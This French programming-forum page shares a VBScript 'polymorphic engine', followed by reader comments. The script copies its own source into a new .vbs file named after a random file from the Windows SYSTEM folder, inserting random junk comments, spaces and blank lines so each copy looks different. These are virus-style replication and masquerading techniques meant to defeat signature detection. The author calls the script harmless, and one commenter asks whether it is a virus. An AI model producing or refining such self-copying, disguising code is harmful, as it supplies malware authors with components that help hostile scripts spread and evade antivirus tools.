Moteur polymorphe a metre dans tout .vbs

Soyez le premier à donner votre avis sur cette source.

Vue 7 271 fois - Téléchargée 339 fois

Description

bin cai un moteur polymorphe ecrit en .vbs qui n'est pas dangeureux

a plaver dans Moteur polymorphe.vbs
c du vbs

Source / Exemple :


Dim F,R,G,O,T
Randomize
Set F=CreateObject("Scripting.FileSystemObject")
O="Moteur polymorphe.vbs"
G=H+".vbs"
F.CreateTextFile G
Set ts=F.OpenTextFile(G,2)
Set R=F.OpenTextFile(O,1)
Do
x=Int(Rnd*4+1)
If x=1 Then z=E
If x=2 Then z=U
If x=3 Then z=L
If x=4 Then z=K(10,20)
If x=5 Then z=vbCrLf
ts.WriteLine z 
If R.AtEndOfStream=-1 Then Exit Do
Loop
ts.Close
R.Close
Function U
If R.AtEndOfStream=0 Then T=R.ReadLine
If Left(T,1)="'" Then U
If T="" Then U
If W=0 Then U
If Left(T,2)="O=" Then T="O="+""""+G+""""
U=T
End Function
Function W
For i=1 To Len(T)
If Mid(T,i,1)<>Chr(32) Then W=2:Exit For
W=0
Next
End Function
Function J(n,m)
For i=0 To (Int(Rnd*(m-n)+n))
J=Chr(14+Int(Rnd*241))+J
Next
End Function
Function K(n,m)
K=Space(Int(Rnd*(m-n)+n))
End Function
Function L
L=J(Int(Rnd*10),Int(Rnd*10)+10)
n=Int(Rnd*3)+1
If n=1 Then y=vbCrLf
If n=2 Then y=K(Int(Rnd*3),Int(Rnd*5)+3)
If n=3 Then y=""
L="'"+L+y
End Function
Function E
d=Int(Rnd*4)+1
For a=0 To d
E=E+vbCrLf
Next
End Function
Function H
Set c=F.GetSpecialFolder(0)
c=c+"\SYSTEM"
Set D=F.GetFolder(C)
Set z=D.Files
x=0
For Each q in z
x=x+1
Next
If x<>0 then
x=int(Rnd*x+1)
s=0
For Each q in z
s=s+1
H=F.GetBaseName(q.name)
If s=x Then Exit For
Next
End If
If O=H+".vbs" then x=0
If x=0 then
H=""
b=Int(rnd*8)+3
For n=1 To b
H=Chr(Int(rnd*25)+65)+H
Next
End If
End Function

Conclusion :


se qu'il fait est simple il prend le nom dun fichier dans windaube/system
lui enleve son extention et cree un fichier du meme nom avec .vbs
a la meme endroit ou est placer le moteur
la mon enfant joux son role en ajoutan des espace des caractere barbar
en commentaire et des enter.
en fait il ne delete rien il lui vole son nom et cree un fichier : meton que Moteur polymorphe.vbs est sur le bureau il vas cree un fuchier nomer du nom voler au fichier system sur le bureau.

Codes Sources

Ajouter un commentaire Commentaires
Messages postés
37
Date d'inscription
dimanche 25 novembre 2007
Statut
Membre
Dernière intervention
3 novembre 2008
1
met des com. stp c vrm dur à comprendre! mé trés bonne source
Messages postés
248
Date d'inscription
mercredi 15 juin 2005
Statut
Membre
Dernière intervention
15 mars 2007
33
commentaire svp....
Messages postés
12
Date d'inscription
vendredi 30 janvier 2004
Statut
Membre
Dernière intervention
17 mars 2004

salut, je comprends pas bien à quoi sert le programme, j'ai l'impression que c'est une sorte de virus ou je me trompe?
Messages postés
1
Date d'inscription
vendredi 11 juin 2004
Statut
Membre
Dernière intervention
16 juin 2004

C pas un vrai moteur polymorph comme d'ecrit sur Securityfocus...

http://securityfocus.com/infocus/1635
http://securityfocus.com/infocus/1638

de plus, sur ce site il y a un seul excellent moteur polimorphic ki remplie preske toutes ces conditions:

http://www.vbfrance.com/code.aspx?ID=8465

voila, c pas si simple de codé une de c chose mais c trés intéressent...moi meme j'en developpe un...
Si je le fini, je le post...en attendant...bonne lecture....
Messages postés
115
Date d'inscription
samedi 2 février 2002
Statut
Membre
Dernière intervention
13 mai 2006

le seul probleme c'est que c'est pas reellement un moteur polymorphe dans le sens ou il ne modifie pas l'op-code du script :)

Vous n'êtes pas encore membre ?

inscrivez-vous, c'est gratuit et ça prend moins d'une minute !

Les membres obtiennent plus de réponses que les utilisateurs anonymes.

Le fait d'être membre vous permet d'avoir un suivi détaillé de vos demandes et codes sources.

Le fait d'être membre vous permet d'avoir des options supplémentaires.